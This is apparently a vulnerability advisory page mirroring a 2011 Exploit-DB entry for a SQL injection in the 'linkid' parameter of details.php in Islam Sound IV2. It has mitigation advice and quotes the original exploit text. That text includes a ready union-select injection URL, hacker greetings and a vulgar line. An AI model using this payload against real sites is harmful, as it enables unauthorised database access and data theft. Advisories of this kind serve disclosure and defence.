Islam Sound IV2 (details.php) Remote SQL Injection

vendor:

Islam Sound IV2

by:

ZxH-Labs

CVSS

HIGH

SQL Injection

CWE

Product Name: Islam Sound IV2

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: a:emides:islam_sound_iv2

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows Server 2003 [IIS]

2011

Islam Sound IV2 (details.php) Remote SQL Injection

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'linkid' parameter to '/details.php' script. A remote attacker can execute arbitrary SQL commands in application's database, cause denial of service, access or modify sensitive data, exploit various vulnerabilities in the underlying SQL server software, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All input data should be validated against a white list of allowed characters and/or types. Additionally, parameterized queries should be used to prevent SQL injection.

Source

Exploit-DB raw data:

# Lab : ZxH-Lab's
# Locate : Jordan - Amman City
# Exploit Title  : Islam Sound IV2 (details.php) Remote SQL Injection 
# Date : 2-2-2011
# Author : ZxH-Labs
# HomeScript  : http://www.emides.com/
# Version : 2.0
# Tested On  : Windows Server 2003 [IIS]

====================================================
#             http://www.site.org/details.php?linkid=[SQL Codes]
#             http://www.site.org/details.php?linkid=-68+and+1=2+union+select+1,2,3,4,5,6,7,8,9--
====================================================

Greet'z 2 Jiko | SadHaCKEr | T0RoB0xHaCKEr | Cyb3r-DevIL | Tw1sT3r | X-Shadow | FreeMAN | Evil SheLL | Sec4ever | Jago-Dz 
Special Thanks 2 AtT4CKxT3rR0rIsT | OSSI 
Sepcial Fuck [ _!_ ] 2 Root-Ar.CoM